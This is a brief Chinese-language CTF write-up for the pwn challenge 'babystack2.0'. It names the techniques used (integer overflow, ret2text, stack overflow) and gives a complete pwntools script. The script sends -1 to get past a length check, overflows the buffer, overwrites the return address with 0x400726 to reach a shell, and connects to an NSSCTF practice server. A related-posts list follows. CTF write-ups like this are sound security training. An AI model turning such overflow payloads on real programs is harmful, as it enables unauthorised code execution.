babystack2.0-入土为安的第十六天

简介: babystack2.0-入土为安的第十六天

checksec pwn

整数溢出

ret2text

栈溢出

这行代码等待服务器发送包含 'your name:' 的提示,然后发送字符串 '-1'。这通常用于触发程序接收用户名的部分。

这行代码在收到包含 "name?" 的提示后,发送前面构造的载荷 payload。这通常用来触发某种缓冲区溢出或其他漏洞,进而将控制权转移到你指定的地址(0x400726

from pwn import*
p=remote("node4.anna.nssctf.cn",28324)
p.sendlineafter('your name:',b'-1')
payload=b'b'*(0x10+8)+p64(0x400726)
p.sendlineafter("name?",payload)
p.interactive()

目录
相关文章
|
1月前
|
人工智能
notsequence 入土为安的第七天
notsequence 入土为安的第七天
26 1
|
1月前
deedeedee 入土为安的第六天
deedeedee 入土为安的第六天
24 0
|
1月前
[MoeCTF 2022]ezTea-入土为安的第十九天
[MoeCTF 2022]ezTea-入土为安的第十九天
28 0
|
1月前
|
Python
[MoeCTF 2022]EquationPy-入土为安的第十九天
[MoeCTF 2022]EquationPy-入土为安的第十九天
32 0
|
1月前
signin-入土为安的第十九天
signin-入土为安的第十九天
36 0
|
1月前
|
安全
[MoeCTF 2022]babyfmt-入土为安的第十九天
[MoeCTF 2022]babyfmt-入土为安的第十九天
27 0
|
1月前
|
Python
re4-unvm-me 入土为安的第六天
re4-unvm-me 入土为安的第六天
41 0
|
1月前
|
数据安全/隐私保护
DosSnake-入土为安第八天
DosSnake-入土为安第八天
29 0
|
1月前
|
数据安全/隐私保护 索引
HardSignin _ 入土为安的第十二天
HardSignin _ 入土为安的第十二天
12 0
|
1月前
|
Python
春秋杯 snack入土为安的第二天
春秋杯 snack入土为安的第二天
21 0